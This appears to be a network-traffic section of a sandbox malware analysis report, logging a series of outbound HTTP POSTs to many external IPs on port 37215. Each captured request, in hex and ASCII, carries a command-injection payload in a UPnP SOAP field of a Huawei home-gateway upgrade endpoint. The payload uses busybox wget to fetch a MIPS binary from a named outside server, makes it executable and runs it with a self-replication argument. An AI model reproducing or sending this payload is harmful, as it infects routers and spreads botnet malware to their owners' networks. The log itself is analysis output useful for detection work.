                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        67192.168.2.233752441.221.103.14837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278692961 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        68192.168.2.235155441.112.225.20437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278695107 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        69192.168.2.2341618197.234.153.5037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278697014 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        70192.168.2.2354808197.28.113.2337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278717995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        71192.168.2.235436886.7.97.22237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278723955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        72192.168.2.233724241.139.194.6437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278727055 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        73192.168.2.2339568112.127.242.737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278727055 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        74192.168.2.2334224197.36.130.14137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278732061 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        75192.168.2.234785441.212.135.24637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278769016 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        76192.168.2.2335696157.121.58.25137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:04.278836012 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
